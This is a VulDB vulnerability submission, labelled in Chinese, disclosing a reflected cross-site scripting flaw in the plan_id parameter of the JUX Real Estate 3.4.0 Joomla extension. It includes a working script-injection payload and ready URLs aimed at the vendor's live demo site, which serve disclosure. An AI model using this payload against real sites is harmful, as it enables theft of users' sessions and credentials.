| 标题 | JoomlaUX JoomlaUX JUX Real Estate 3.4.0 Cross Site Scripting |
|---|
| 描述 | # Exploit Title: JUX Real Estate 3.4.0 - RXSS
# Exploit Author: Emano888
# Date: 10/03/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Impact: Manipulate the content of the site
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path:
/extensions/realestate/index.php/agents/agent-register/addagent
https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
GET parameter 'plan_id' is vulnerable to XSS
https://[hostname]/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
Payload: "><sCrIpT>alert(1)</sCrIpT>
Live POC:
https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| 来源 | ⚠️ https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| 用户 | Anonymous User |
|---|
| 提交 | 2025-03-10 21時44分 (1 年前) |
|---|
| 管理 | 2025-03-24 12時36分 (14 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 300734 [JoomlaUX JUX Real Estate 3.4.0 addagent plan_id 跨网站脚本] |
|---|
| 积分 | 20 |
|---|